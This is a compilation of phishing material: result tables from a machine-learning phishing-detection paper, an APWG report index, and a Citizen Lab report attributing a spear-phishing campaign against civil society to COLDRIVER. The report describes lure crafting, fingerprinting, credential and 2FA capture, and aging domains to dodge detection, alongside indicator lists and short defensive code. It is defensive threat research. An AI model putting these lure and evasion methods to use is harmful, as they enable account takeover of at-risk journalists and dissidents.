UCI Machine Learning Repository: Phishing Websites Data Set. Available online: https://archive.ics.uci.edu/ml/datasets/phishing+websites (accessed on 29 November 2021).
Ramesh, G.; Krishnamurthi, I.; Kumar, K.S.S. An Efficacious Method for Detecting Phishing Webpages through Target Domain Identification. Decis. Support Syst. 2014, 61, 12–22.
Singh, C. Phishing Website Detection Based on Machine Learning: A Survey. In Proceedings of the 2020 6th International Conference on Advanced Computing and Communication Systems (ICACCS), IEEE, Coimbatore, India, 6–7 March 2020; pp. 398–404.
Alsariera, Y.A.; Elijah, A.V.; Balogun, A.O. Phishing Website Detection: Forest by Penalizing Attributes Algorithm and Its Enhanced Variations. Arab. J. Sci. Eng. 2020, 45, 10459–10470.

Model	Dataset	Algorithm	Accuracy
James et al.	URLs	IBK, SVM, NB	89.75%
Subasi et al.	Websites	ANN, KNN, RF, SVM, C4.5, RF	97.36%
Mao et al.	Websites	SVM, RF, DT, AB	93%
Tyagi et al.	URLs	DT, RF, GBM	98.40%
Chen and Chen	Websites	ELM, SVM, LR, C4.5, LC-ELM, KNN, XGB	99.2%
Joshi et al.	Websites	RF	97.63%
Ubing et al.	UCI	Ensemble bagging, boosting, stacking	95.4%
Sahingoz et al.	Websites	SVM, DT, RF, KNN, KS, NB	97.98%
Abdelhamid et al.	URLs	eDRI	93.5%
Patil et al.	URLs	LR, DT, RF	96.58%
Jain and Gupta	Websites	RF	99.57%
Jagadeesan et al.	URLs	RF, SVM	95.11%
Niranjan et al.	Websites	RC, kNN, IBK, LR, PART	97.3%
Chiew et al.	URLs	RF, C4.5, PART, SVM, NB	96.17%
Pandey et al.	Websites	SVM, RF	94%
Ali and Ahmed	Websites	Genetic algorithm (GA) + DNN	89.50%
Aljofey et al.	Websites	CNN	95.02%
Shie	Websites	Convolutional auto encoder + DNN	89.00%
Maurya and Jain	Websites	PSL 1 + PART	99.30%
Wang et al.	Websites	RNN + CNN	95.79%
Lakshmi et al.	UCI	DNN + Adam	96.00%
Li et al.	URLs	GBDT, XGBoost and LightGBM	98.60%
Yang et al.	Websites	Auto encoder + NIOSELM	94.60%
Anupam and Arpan	Websites	Grey wolf optimizer + SVM	90.38%

Classifier	Before Use Normalization	After Use Normalization
SVM	Accuracy: 94.46 Precision: 93.64 Recall: 96.62 F1-measure: 95.10	Accuracy: 94.66 Precision: 93.9 Recall: 96.6 F1-measure: 95.3
ANN	Accuracy: 95.5 Precision: 95.6 Recall: 96.3 F1-measure: 96	Accuracy: 96.2 Precision: 96 Recall: 97.2 F1-measure: 96.6
RF	Accuracy: 96.86 Precision: 96.56 Recall: 97.84 F1-measure: 97.20	Accuracy: 97.3 Precision: 96.9 Recall: 98.62 F1-measure: 97.6
DT	Accuracy: 95.4 Precision: 95.8 Recall: 95.9 F1-measure: 95.8	Accuracy: 96.3 Precision: 96.5 Recall: 96.8 F1-measure: 96.7

Classifier	Parameters	TPR	TNR
SVM	Kernel function = rbf	0.92	0.96
ANN	Iterations = 500, Activation = Relu, Optimizer = Adam	0.94	0.96
RF	Trees = 100, Creation = gini	0.96	0.98
DT	Criterion = gini, Splitter = best	0.95	0.96

Classifier	Accuracy	Precision	Recall	F1-Measure
SVM	94.66	93.9	96.6	95.3
ANN	95.5	95.6	96.3	96
RF	97.3	96.9	98.2	97.6
DT	96.3	96.5	96.8	96.7
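As a quick consistency check on the table above, F1 is the harmonic mean of precision and recall. The sketch below recomputes it from the reported precision and recall values. The function name `f1_from` is our own, and small differences (under 0.1 percentage points) are expected because the reported inputs are already rounded.

```python
def f1_from(precision: float, recall: float) -> float:
    """Harmonic mean of precision and recall (same units as the inputs)."""
    if precision + recall == 0:
        return 0.0
    return 2 * precision * recall / (precision + recall)


# (precision, recall, reported F1) copied from the table above, in percent.
reported = {
    "SVM": (93.9, 96.6, 95.3),
    "ANN": (95.6, 96.3, 96.0),
    "RF": (96.9, 98.2, 97.6),
    "DT": (96.5, 96.8, 96.7),
}

for name, (p, r, f1) in reported.items():
    print(f"{name}: recomputed {f1_from(p, r):.2f}, reported {f1}")
```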

Schemes	Dataset	Algorithm	Accuracy
Ubing et al. [ ]	UCI	Ensemble bagging, boosting, stacking	95.4%
Alsariera et al. [ ]	UCI	ForestPA-PWDM, Bagged-ForestPA-PWDM, and Adab-ForestPA-PWDM	96.26% 96.5% 97.4%
Lakshmi et al. [ ]	UCI	DNN +Adam	96.00%
Random Forest Model	UCI	Random Forest	97.3%


Alnemari, S.; Alshammari, M. Detecting Phishing Domains Using Machine Learning. Appl. Sci. 2023 , 13 , 4649. https://doi.org/10.3390/app13084649



Phishing Activity Trends Reports

The APWG Phishing Activity Trends Report analyzes phishing attacks reported to the APWG by its member companies, its Global Research Partners, through the organization’s website at https://apwg.org, and by e-mail submissions to [email protected]. APWG also measures the evolution, proliferation, and propagation of crimeware by drawing from the research of our member companies.

Summary – 1st Quarter 2024

Phone-based phishing, directly engaging victims, proliferates unchecked. Phone numbers used for fraud comprised more than 20% of fraud-related assets identified by OpSec in Q1 2024.
Phishing using phone calls — so-called voice phishing or “vishing”— is increasing every quarter.
In Q1 2024, APWG observed 963,994 phishing attacks, the lowest quarterly total since Q4 2021.
Social media platforms were the most frequently attacked sector, targeted by 37.4% of all phishing attacks in Q1 2024. Banking-segment phishing continued to decline, down to 9.8%.
The average wire transfer amount requested in BEC attacks in Q1 2024 was $84,059, up nearly 50% from the prior quarter’s average.

Legacy Reports

Phishing Attack Trends Report – 4Q 2023 Anti-Phishing Working Group – Released November 13, 2023

Phishing Attack Trends Report – 3Q 2023 Anti-Phishing Working Group – Released November 13, 2023

Phishing Attack Trends Report – 2Q 2023 Anti-Phishing Working Group – Released November 02, 2023

Phishing Attack Trends Report – 1Q 2023 Anti-Phishing Working Group – Released November 02, 2023

Phishing Attack Trends Report – 3Q 2022 Anti-Phishing Working Group – Released December 12, 2022

Phishing Attack Trends Report – 2Q 2022 Anti-Phishing Working Group – Released September 20, 2022

Phishing Attack Trends Report – 1Q 2022 Anti-Phishing Working Group – Released June 07, 2022

Phishing Attack Trends Report – 4Q 2021 Anti-Phishing Working Group – Released February, 2022

Phishing Attack Trends Report – 3Q 2021 Anti-Phishing Working Group – Released November, 2021

Phishing Attack Trends Report – 2Q 2021 Anti-Phishing Working Group – Released June 08, 2021

Phishing Attack Trends Report – 1Q 2021 Anti-Phishing Working Group – Released June 08, 2021

Phishing Attack Trends Report – 4Q 2020 Anti-Phishing Working Group – Released February 09, 2021

Phishing Attack Trends Report – 3Q 2020 Anti-Phishing Working Group – Released November 24, 2020

Phishing Attack Trends Report – 2Q 2020 Anti-Phishing Working Group – Released May 11, 2020

Phishing Attack Trends Report – 1Q 2020 Anti-Phishing Working Group – Released May 11, 2020

Phishing Attack Trends Report – 4Q 2019 Anti-Phishing Working Group – Released November 4, 2019

Phishing Attack Trends Report – 3Q 2019 Anti-Phishing Working Group – Released November 4, 2019

Phishing Attack Trends Report – 2Q 2019 Anti-Phishing Working Group – Released Sept 12, 2019

Phishing Attack Trends Report – 1Q 2019 Anti-Phishing Working Group – Released May 15, 2019

Phishing Attack Trends Report – 4Q 2018 Anti-Phishing Working Group – Released Mar 04, 2019

Phishing Attack Trends Report – 3Q 2018 Anti-Phishing Working Group – Released Dec 12, 2018

Phishing Attack Trends Report – 2Q 2018 Anti-Phishing Working Group – Released Oct 18, 2018

Phishing Attack Trends Report – 1Q 2018 Anti-Phishing Working Group – Released July 31, 2018

Phishing Attack Trends Report – 4Q 2017 Anti-Phishing Working Group – Released May 15, 2018

Phishing Attack Trends Report – 3Q 2017 Anti-Phishing Working Group – Released Feb 27, 2018

Phishing Attack Trends Report – 1H 2017 Anti-Phishing Working Group – Released Oct 17, 2017

Phishing Attack Trends Report – 4Q 2016 Anti-Phishing Working Group – Released Feb 22, 2017

Phishing Attack Trends Report – 3Q 2016 Anti-Phishing Working Group – Released Dec 21, 2016

Phishing Attack Trends Report – 2Q 2016 Anti-Phishing Working Group – Released Oct 03, 2016

Phishing Attack Trends Report – 1Q 2016 Anti-Phishing Working Group – Released May 24, 2016

Phishing Attack Trends Report – 4Q 2015 Anti-Phishing Working Group – Released March 22, 2016

Phishing Attack Trends Report – 1Q-Q3 2015 Anti-Phishing Working Group – Released December 23, 2015

Phishing Attack Trends Report – 4Q 2014 Anti-Phishing Working Group – Released April 29, 2015

Phishing Attack Trends Report – 3Q 2014 Anti-Phishing Working Group – Released March 30, 2015

Phishing Attack Trends Report – 2Q 2014 Anti-Phishing Working Group – Released Aug 29, 2014

Phishing Attack Trends Report – 1Q 2014 Anti-Phishing Working Group – Released Jun 23, 2014

Phishing Attack Trends Report – 4Q 2013 Anti-Phishing Working Group – Released Apr 27, 2014

Phishing Attack Trends Report – 3Q 2013 Anti-Phishing Working Group – Released Feb 07, 2014

Phishing Attack Trends Report – 2Q 2013 Anti-Phishing Working Group – Released Nov 06, 2013

Phishing Attack Trends Report – 1Q 2013 Anti-Phishing Working Group – Released July 30, 2013

Phishing Attack Trends Report – 4Q 2012 Anti-Phishing Working Group – Released April 24, 2013

Phishing Attack Trends Report – 3Q2012 Anti-Phishing Working Group – Released February 1, 2013

Phishing Attack Trends Report – 2Q 2012 Anti-Phishing Working Group – Released September 12, 2012

Phishing Attack Trends Report – 1Q 2012 Anti-Phishing Working Group – Released July 19, 2012

Phishing Attack Trends Report – 2H 2011 Anti-Phishing Working Group – Released May 25, 2012

Phishing Attack Trends Report – 1H 2011 Anti-Phishing Working Group – Released Dec 23, 2011

Phishing Attack Trends Report – 2H 2010 Anti-Phishing Working Group – Released Jul 31, 2011

Phishing Attack Trends Report – Q2 2010 Anti-Phishing Working Group – Released Jan 26, 2010

Phishing Attack Trends Report – Q1 2010 Anti-Phishing Working Group – Released Sept 23, 2010

Phishing Attack Trends Report – Q4 2009 Anti-Phishing Working Group – Released Mar 05, 2010

Phishing Attack Trends Report – Q3 2009 Anti-Phishing Working Group – Released Jan 13, 2010

Phishing Attack Trends Report – First Half 2009 Anti-Phishing Working Group – Released Sept 27, 2009

Phishing Attack Trends Report – Second Half 2008 Anti-Phishing Working Group – Released Mar 17, 2009

Phishing Attack Trends Report – Second Quarter 2008 Anti-Phishing Working Group – Released Dec 8, 2008

Phishing Attack Trends Report – First Quarter 2008 Anti-Phishing Working Group – Released Aug 29, 2008

Note: Starting in 2008, the APWG began generating its phishing trends report on a quarterly and annual basis. This longer-term view will allow time for better analysis to assess trends in electronic crime and phishing.

Phishing Attack Trends Report – January 2008 Anti-Phishing Working Group – Released Mar 3, 2008

Phishing Attack Trends Report – December 2007 Anti-Phishing Working Group – Released Mar 3, 2008

Phishing Attack Trends Report – November 2007 Anti-Phishing Working Group – Released Jan 25, 2008

Phishing Attack Trends Report – October 2007 Anti-Phishing Working Group – Released Jan 7, 2008

Phishing Attack Trends Report – September 2007 Anti-Phishing Working Group – Released Dec 17, 2007

Phishing Attack Trends Report – August 2007 Anti-Phishing Working Group – Released Nov 19, 2007

Phishing Attack Trends Report – July 2007 Anti-Phishing Working Group – Released Oct 18, 2007

Phishing Attack Trends Report – Jun 2007 Anti-Phishing Working Group – Released Sept 3, 2007

Phishing Attack Trends Report – May 2007 Anti-Phishing Working Group – Released July 8, 2007

Phishing Attack Trends Report – April 2007 Anti-Phishing Working Group – Released May 23 2007

Phishing Attack Trends Report – March 2007 Anti-Phishing Working Group – Released May 14 2007

Phishing Attack Trends Report – February 2007 Anti-Phishing Working Group – Released April 11 2007

Phishing Attack Trends Report – January 2007 Anti-Phishing Working Group – Released March 2007

Phishing Attack Trends Report – December 2006 Anti-Phishing Working Group – Released February 2007

Phishing Attack Trends Report – November 2006 Anti-Phishing Working Group – Released January 2007

Phishing Attack Trends Report – Sept/Oct 2006 Anti-Phishing Working Group – Released December 2006

Phishing Attack Trends Report – August 2006 Anti-Phishing Working Group – Released October 2006

Phishing Attack Trends Report – July 2006 Anti-Phishing Working Group – Released September 2006

Phishing Attack Trends Report – June 2006 Anti-Phishing Working Group – Released August 2006

Phishing Attack Trends Report – May 2006 Anti-Phishing Working Group – Released June 2006

Phishing Attack Trends Report – April 2006 Anti-Phishing Working Group – Released May 2006

Phishing Attack Trends Report – March 2006 Anti-Phishing Working Group – Released May 2006

Phishing Attack Trends Report – February 2006 Anti-Phishing Working Group – Released April 2006

Phishing Attack Trends Report – January 2006 Anti-Phishing Working Group – Released March 2006

Phishing Attack Trends Report – December 2005 Anti-Phishing Working Group – Released Feb , 2006

Phishing Attack Trends Report – November 2005 Anti-Phishing Working Group – Released Jan 09, 2006

Phishing Attack Trends Report – October 2005 Anti-Phishing Working Group – Released Dec 13, 2005

Phishing Attack Trends Report – September 2005 Anti-Phishing Working Group – Released Nov 15, 2005

Phishing Attack Trends Report – August 2005 Anti-Phishing Working Group – Released Sept 10, 2005

Phishing Attack Trends Report – July 2005 Anti-Phishing Working Group – Released June 21, 2005

Phishing Attack Trends Report – June 2005 Anti-Phishing Working Group – Released June 21, 2005

Phishing Attack Trends Report – May 2005 Anti-Phishing Working Group – Released May 28, 2005

Phishing Attack Trends Report – April 2005 Anti-Phishing Working Group – Released April 22, 2005

Phishing Attack Trends Report – March 2005 Anti-Phishing Working Group – Released March 27, 2005

Phishing Attack Trends Report – February 2005 Anti-Phishing Working Group – Released March 24, 2005

Phishing Attack Trends Report – January 2005 Anti-Phishing Working Group – Released February 24, 2005

Phishing Attack Trends Report – December 2004 Anti-Phishing Working Group – Released January 20, 2005

Phishing Attack Trends Report – November 2004 Anti-Phishing Working Group – Released December, 2004

NOTE: Starting with the August-October 2004 Phishing Attack Trends Report, a secondary way of tracking phishing attacks was added to the methodology. We now track unique email lures and unique data collection server sites. See the reports for more details.

Phishing Attack Trends Report – August-October 2004 Anti-Phishing Working Group – Released November, 2004

Phishing Attack Trends Report – July 2004 Anti-Phishing Working Group – Released August, 2004

Phishing Attack Trends Report – June 2004 Anti-Phishing Working Group – Released July, 2004

Phishing Attack Trends Report – May 2004 Anti-Phishing Working Group – Released June, 2004

Phishing Attack Trends Report – April 2004 Anti-Phishing Working Group – Released May, 2004

Phishing Attack Trends Report – March 2004 Anti-Phishing Working Group – Released Apr, 2004

Phishing Attack Trends Report – February 2004 Anti-Phishing Working Group – Released Mar, 2004

Special Report on Phishing – March 2004 United States Department of Justice – Released Mar, 2004

Phishing Attack Trends Report – January 2004 Anti-Phishing Working Group – Released Feb, 2004


Rivers of Phish: Sophisticated Phishing Targets Russia’s Perceived Enemies Around the Globe

A sophisticated spear phishing campaign has been targeting Western and Russian civil society.
This campaign, which we have investigated in collaboration with Access Now and with the participation of numerous civil society organizations including First Department, Arjuna Team, and RESIDENT.ngo, engages targets with personalized and highly-plausible social engineering in an attempt to gain access to their online accounts.
We attribute this campaign to COLDRIVER (also known as Star Blizzard, Callisto and other designations). This threat actor is attributed to the Russian Federal Security Service (FSB) by multiple governments.
We identified a second threat actor targeting similar communities, whom we name COLDWASTREL. We assess that this actor is distinct from COLDRIVER, and that the targeting that we have observed aligns with the interests of the Russian government.
The Citizen Lab is sharing all indicators with major email providers to assist them in tracking and blocking these campaigns.

See also the Access Now report and the Access Now Helpline Technical Brief.

1. River of Phish: Campaign Overview

Our collaborative investigation with Access Now, with the assistance of multiple additional civil society organizations including First Department, Arjuna Team, and RESIDENT.ngo, has identified digital targeting using sophisticated spear phishing by this threat actor across multiple countries and sectors within civil society.

Observed Targets

The targets range from prominent Russian opposition figures-in-exile to staff at nongovernmental organizations in the US and Europe, funders, and media organizations. A focus on Russia, Ukraine, or Belarus is a common thread running through all of the cases. Some of the targets still live and work in Russia, placing them at considerable risk. Almost all targets that spoke with us and our investigative partner, Access Now, have chosen to remain unnamed and, for their privacy and safety, we are only including indicators from a limited selection of the cases that we have examined.

Polina Machold, Publisher of Proekt Media, is among the targets, and we observed the attackers masquerading as an individual known to her. Proekt conducts high-profile investigative reporting into official corruption and abuses of power in Russia, and is well known for its reporting on Vladimir Putin, Ramzan Kadyrov, and other highly-placed Russian officials. Soon after its reporting on Russia’s interior minister in 2021, Proekt was declared an “undesirable organization” by the Russian Government.

We have also observed targeting of former officials and academics in the US think tank and policy space. For example, former US Ambassador to Ukraine Steven Pifer was targeted with a highly-credible approach impersonating someone known to him: a fellow former US Ambassador.

We judge that these targets may have been selected for their extensive networks among sensitive communities, such as high-risk individuals within Russia. For some, successful compromise could result in extremely serious consequences, such as imprisonment or physical harm to themselves or their contacts.

Importantly, we suspect that the total pool of targets is likely much larger than the civil society groups whose cases we have analyzed. We have observed US government personnel impersonated as part of this campaign, and given prior reporting about COLDRIVER’s targeting, we expect the US government remains a target.

Typical Attack Flow: A Credible, Personalized Approach

The most common tactic we have observed is for the threat actor to initiate an email exchange with the target masquerading as someone known to them. This tactic includes masquerading as colleagues, funders, and US government employees. Typically, the messages contain text requesting that the recipient review a document relevant to their work, such as a grant proposal or an article draft.

In some cases, we have observed additional communication by the threat actor preceding or following the targeting message. Often highly and effectively personalized, this communication illustrates the depth of the threat actors’ understanding of the targets. Multiple targets believed that they were exchanging emails with a real person.

We often observed the attacker omitting to attach a PDF file to the initial message requesting a review of the “attached” file. We believe this was intentional, and intended to increase the credibility of the communication, reduce the risk of detection, and select only for targets that replied to the initial approach (e.g. pointing out the lack of an attachment).
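One way a mail-triage script might surface this pattern is to flag messages whose text refers to an attachment although none is present. The sketch below uses Python's standard `email` package. The function name and the keyword match are illustrative assumptions, not a rule described in this report, and the check will also fire on honest mistakes, so it should be treated as a weak signal only.

```python
from email import message_from_string
from email.policy import default


def mentions_missing_attachment(raw_message: str) -> bool:
    """True if the plain-text body mentions an attachment but none is present."""
    msg = message_from_string(raw_message, policy=default)
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content().lower() if body is not None else ""
    has_attachment = any(True for _ in msg.iter_attachments())
    # Crude keyword match (assumption): "attach" covers "attached", "attachment".
    return "attach" in text and not has_attachment


# Hypothetical message: asks for a review of an "attached" draft, attaches nothing.
sample = (
    "From: colleague@example.org\n"
    "To: target@example.org\n"
    "Subject: Draft for review\n"
    "\n"
    "Could you look over the attached draft before Friday?\n"
)
print(mentions_missing_attachment(sample))
```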

Figure: A purportedly-encrypted PDF lure.

The email message typically contains an attached PDF file purported to be encrypted or “protected” using a privacy-focused online service such as ProtonDrive. In fact, this is a ruse. When opened, the PDF displays what appears to be blurred text along with a link to “decrypt” or access the file. Actual ProtonDrive encryption looks substantially different from the River of Phish lures, suggesting that the attackers are relying on a general lack of awareness of what secure and encrypted document sharing looks like. In other cases, the blurred PDF includes text saying that a preview is not available, again soliciting a click.

While typical attacks were limited to a PDF, we also observed a few cases in which the attackers sent an email crafted to appear as a document share, with the phishing link directly embedded in the email message. When one such case seemingly failed to generate a successful compromise, the attackers followed up with a PDF.

In some cases, the attackers followed up with targets that failed to enter their credentials with multiple messages asking if they had seen or “reviewed” the material. This approach, again, suggests a high degree of focus on particular targets.

If the Target Clicks

If the target clicks on the link, their browser will fetch JavaScript code from the attacker’s server that computes a fingerprint of the target’s system and submits it to the server (see: Target Fingerprinting). If the server elects to proceed with the attack, the server will return a URL, and the JavaScript code running in the target’s browser will redirect the target there. If the server chooses, a CAPTCHA (from hCaptcha) may be shown to the user prior to any redirect. The URL to which the target is redirected is typically a webpage crafted by the attacker to look like a genuine login page for the target’s email service (e.g. Gmail or ProtonMail).

The login page may be pre-populated with the target’s email address to mimic the legitimate login page. If the target enters their password and two-factor code into the form, these items will be sent to the attacker who will use them to complete the login and obtain a session cookie for the target’s account. This cookie allows the attacker to access the target’s email account as if they were the target themselves. The attacker can continue to use this token for some time without re-authenticating.
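Because the fake login page can look identical to the real one, the hostname in the address bar is a more dependable signal than the page's appearance. The following is a minimal sketch of an exact-match hostname check. The allowlist entries and the function name are illustrative assumptions and are not drawn from this report.

```python
from urllib.parse import urlsplit

# Illustrative allowlist (assumption): hostnames a user expects for sign-in.
EXPECTED_LOGIN_HOSTS = {"accounts.google.com", "account.proton.me"}


def is_expected_login_host(url: str) -> bool:
    """True only for an HTTPS URL whose hostname is exactly on the allowlist."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    return parts.scheme == "https" and host in EXPECTED_LOGIN_HOSTS


# The second URL is a hypothetical lookalike: the expected name is only a prefix.
print(is_expected_login_host("https://accounts.google.com/signin"))
print(is_expected_login_host("https://accounts.google.com.example.net/signin"))
```

Exact matching is deliberate here: substring or prefix checks would accept the lookalike host in the second example.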

The use of a credible email ruse plus a PDF containing a phishing link is a favorite technique of multiple threat actors. Notably, PDF viewers built into webmail services like Gmail allow the recipient to click on hyperlinks within a PDF, and thus do not impede this attack.

2. River of Phish Campaign Infrastructure

First-stage domains.

The first-stage infrastructure for this campaign involves phishing links embedded in the delivered PDFs, or sent in emails crafted to appear as document shares. The attackers typically register the domains and host the websites using Hostinger. Domains registered with Hostinger are hosted on shared servers which rotate IP addresses approximately every 24 hours, making the campaign more difficult to track. We did not identify any cases where a domain was operationally used within 30 days of its registration. This is a possible attempt to avoid being blocked by detection rules aimed at flagging emails or attachments with hyperlinks containing a recently registered domain.


ithostprotocol[.]com	2024-01-16	2024-02-20	NameCheap	cPanel
xsltweemat[.]org	2024-03-14	2024-04-12	Hostinger	Let’s Encrypt
eilatocare[.]com	2024-04-09	2024-05-29	Hostinger	Let’s Encrypt
egenre[.]net	2024-05-19	2024-06-19	Hostinger	Let’s Encrypt
esestacey[.]net	2024-05-19	2024-06-19	Hostinger	ZeroSSL
ideaspire[.]net	2024-05-20	2024-06-24	Hostinger	Let’s Encrypt
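The kind of detection rule mentioned above, which flags links to recently registered domains, can be sketched as a simple date comparison. The 30-day threshold mirrors the figure in the text. The function names and the example dates are hypothetical, and real rules would obtain the registration date from a registration-data lookup that is out of scope here.

```python
from datetime import date


def days_between(first: str, second: str) -> int:
    """Days from one ISO date (YYYY-MM-DD) to another."""
    return (date.fromisoformat(second) - date.fromisoformat(first)).days


def is_recently_registered(registered: str, seen: str, threshold_days: int = 30) -> bool:
    """True if a domain appears in a message within threshold_days of registration."""
    return days_between(registered, seen) < threshold_days


# Hypothetical dates: a domain used 9 days after registration is flagged,
# while one left to age for 45 days passes the same rule.
print(is_recently_registered("2024-01-01", "2024-01-10"))
print(is_recently_registered("2024-01-01", "2024-02-15"))
```

The second call illustrates why letting a domain age before use is enough to slip past a rule of this shape.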

If the target clicks on the link in the PDF, the attack moves onto the next stage, which involves fingerprinting the user’s system.

Target Fingerprinting

Each first-stage domain runs JavaScript code to fingerprint the target’s browser and returns the fingerprint to the server, which decides how to proceed. Because we cannot see the server’s code, we are not fully sure what the purpose of the fingerprinting is. However, because the server can elect to show a CAPTCHA to the target, we presume that the purpose of the fingerprinting may be to prevent certain automated tools from obtaining or analyzing the second-stage infrastructure, which contains the phishing page.

We did not directly observe the second stage of the attack or the credentials being passed back to the attacker’s infrastructure; however, based on the targets’ descriptions of the login page it is likely that the attackers leveraged a tool that is specifically designed to capture user credentials and enable unauthorized access, such as Evilginx or another phishing platform. We note that COLDRIVER has been observed using Evilginx in recent cases.

Our investigative partner, Access Now, has included a description of the fingerprinting code in their Technical Brief. The fingerprinting code was obfuscated using the Hunter PHP Javascript Obfuscator, a tool that is publicly available on GitHub.

Frequent Metadata Overlaps Across PDFs

PDFs associated with this campaign share consistent characteristics, including the location and formatting of the malicious link within the PDF, the PDF metadata, and the use of a fake English-language name that is different in each case for the PDF author. Based on the names identified in the PDFs, it appears that a list of names was used to generate them.

The chart below includes metadata from some PDFs that were shared directly with the Citizen Lab and Access Now.



b07d54a178726ffb9f2d5a38e64116cbdc361a1a0248fb89300275986dc5b69d	Gracelyn Reilly	LibreOffice 7.0	en-US
0ded441749c5391234a59d712c9d8375955ebd3d4d5848837b8211c6b27a4e88	Talon Blackburn	LibreOffice 7.0	en-US
efa2fd8f8808164d6986aedd6c8b45bb83edd70ca4e80d7ff563a3fbc05eab89	Howard Howe	LibreOffice 7.0	en-US
384d3027d92c13da55ceef9a375e8887d908fd54013f49167946e1791730ba22	Annabelle Kline	LibreOffice 7.0	en-US
00664f72386b256d74176aacbe6d1d6f6dd515dd4b2fcb955f5e0f6f92fa078e	Paulina Mullen	LibreOffice 7.0	en-US
79f93e57ad6be28aae62d14135140289f09f86d3a093551bd234adc0021bb827	Emery Hogan	LibreOffice 7.0	en-US
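A defender with access to extracted PDF metadata could check a file against the traits shared by the rows above. This is a minimal sketch over plain records. The field names (`sha256`, `author`, `software`, `language`) are our own labels for the table's columns, and extracting the values from a PDF is assumed to happen elsewhere. LibreOffice and en-US are both very common, so a match on these traits alone is weak evidence.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class PdfMetadata:
    sha256: str
    author: str
    software: str
    language: str


# Traits shared by every row in the table above (field names are assumptions).
SHARED_TRAITS = {"software": "LibreOffice 7.0", "language": "en-US"}

# One hash copied from the table above; a real list would hold all indicators.
KNOWN_HASHES = {
    "b07d54a178726ffb9f2d5a38e64116cbdc361a1a0248fb89300275986dc5b69d",
}


def matches_shared_traits(meta: PdfMetadata) -> bool:
    """True if the record carries every shared metadata trait."""
    return all(getattr(meta, key) == value for key, value in SHARED_TRAITS.items())


def is_known_sample(meta: PdfMetadata) -> bool:
    """True if the file hash is already on the indicator list."""
    return meta.sha256.lower() in KNOWN_HASHES


first_row = PdfMetadata(
    "b07d54a178726ffb9f2d5a38e64116cbdc361a1a0248fb89300275986dc5b69d",
    "Gracelyn Reilly",
    "LibreOffice 7.0",
    "en-US",
)
print(matches_shared_traits(first_row), is_known_sample(first_row))
```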

Target Phishing

In the cases we analyzed as part of this particular campaign, user credentials and associated two-factor authentication (2FA) tokens appear to be the primary targets of this phase of attack. We did not find any spyware delivered to target devices as part of this particular campaign. The focus on account access simplifies the attack infrastructure that is needed, as the attackers do not need to gain persistence or establish ongoing communications with the target’s machine. It is important to note that the individuals and organizations targeted in this campaign likely face additional threats, such as spyware attacks.

In January of 2024, Google’s Threat Analysis Group (TAG) reported on a custom malware backdoor called SPICA, which they assessed was the first known case of COLDRIVER developing and deploying custom malware. Similarly, we believe some of the targets who shared files with us may be regularly targeted by multiple threat actors using a variety of Tactics, Techniques, and Procedures (TTPs). While this particular campaign did not leverage malware, we encourage human rights defenders, dissidents, journalists, and other members of civil society that may be targeted by Russian authorities to exercise extreme vigilance and contact experts such as Access Now’s Digital Security Helpline for help. We provide tips on how to identify suspicious communications below (See: Protect Yourself & Your Colleagues).

3. River of Phish: COLDRIVER Attribution

COLDRIVER is a Russia-based threat group that several governments have assessed to be subordinate to the Russian Federal Security Service (FSB) Centre 18 (See: The Russian Cyber Espionage Landscape, below). They have been active since at least 2019, possibly earlier, and their tactics primarily include highly involved social engineering and persona development. These personas are typically used to trick the target into visiting a malicious link, leading to the theft of their credentials, the bypassing of 2FA, and access to the target’s information. This group has targeted widely in a pattern that aligns with Russian state interests, including targeting academia, NGOs, government institutions, and think tanks.

Selected Prior Reporting on COLDRIVER

Prior reporting on COLDRIVER describes strikingly similar tactics to the ones we see in this campaign. In 2017, cybersecurity firm F-Secure reported on the activities of a group they tracked as “Callisto group”, writing that they had tracked them since 2015. Their research highlighted the group’s use of spear phishing to target “military personnel, government officials, think tanks and journalists.” The attackers frequently impersonated legitimate websites and email addresses to trick targets into providing their credentials. At the time, F-Secure did not publicly attribute the group.


F-Secure	Callisto group
Microsoft	Star Blizzard / SEABORGIUM
Google TAG	COLDRIVER
PWC	Blue Callisto
Proofpoint	TA446
Sekoia	Calisto
Recorded Future	Blue Charlie
Mandiant	UNC4057

In 2022, Microsoft reported on the group, which they track as Star Blizzard (previously SEABORGIUM). Google’s Threat Analysis Group (TAG) reported on them as COLDRIVER, PwC reported on them as Blue Callisto, Proofpoint reported on them as TA446, Sekoia reported on them as Calisto, and Recorded Future reports on them as Blue Charlie. All research teams described similar tactics: elaborate spear phishing campaigns impersonating individuals known to the targets with the goal of stealing credentials to accounts and accessing sensitive information. In 2022, attribution was typically framed as “a likely Russia-based actor.”

Attribution of COLDRIVER to the FSB in a Joint Governmental Advisory

In December 2023, government agencies from Australia, Canada, New Zealand, the United Kingdom, and the United States issued a joint cybersecurity advisory detailing the activities of COLDRIVER. The advisory attributed the group to the FSB’s Centre 18. The advisory notes that COLDRIVER’s targets include “academia, defense, governmental organizations, NGOs, think tanks and politicians.” The TTPs outlined in the advisory include extended target reconnaissance, the use of fake email and social media accounts, preference to target personal emails, the use of conference or event invitations as lures, the use of malicious domains impersonating legitimate organizations and more.

Attributing The River of Phish Campaign to COLDRIVER

Multiple TTPs and targeting from the River of Phish campaign closely align with public reporting on COLDRIVER. However, some of COLDRIVER’s tactics (like lures using “encrypted” documents) share certain similarities with other threat actors. To increase our confidence, we sought to ensure that the River of Phish campaign matches multiple other research groups’ COLDRIVER attribution. To that end, we approached Microsoft MSTIC, Proofpoint, and PwC, among others. Materials they shared enabled us to identify multiple direct overlaps between the River of Phish campaign and COLDRIVER. Finally, each independently confirmed that the activity we identified matched their own tracking of COLDRIVER. Together, this information suggests that the River of Phish campaign is attributable to the threat actor identified as COLDRIVER.

River of Phish Sample Overlap with Known COLDRIVER Campaigns

Proofpoint shared several publicly-available PDFs (on VirusTotal) with us that they attribute to COLDRIVER. Examination of these PDFs yielded multiple critical overlaps with the River of Phish campaign including: (a) matching bait PDF document structure and metadata and (b) overlapping phishing infrastructure.

Like the River of Phish (“RoP”) PDFs (See: Table 2 above), those shared by Proofpoint included identical LibreOffice versions, seemingly-randomized author names, and en-US language settings.


c1fa7cd73a14946fc760a54ebd0c853fab24a080cbf6b8460a949f28801e16fc	Alexis Hill	LibreOffice 7.0	en-US
603221a64f2843674ad968970365f182c228b7219b32ab3777c265804ef67b0a	Carley Rivers	LibreOffice 7.0	en-US
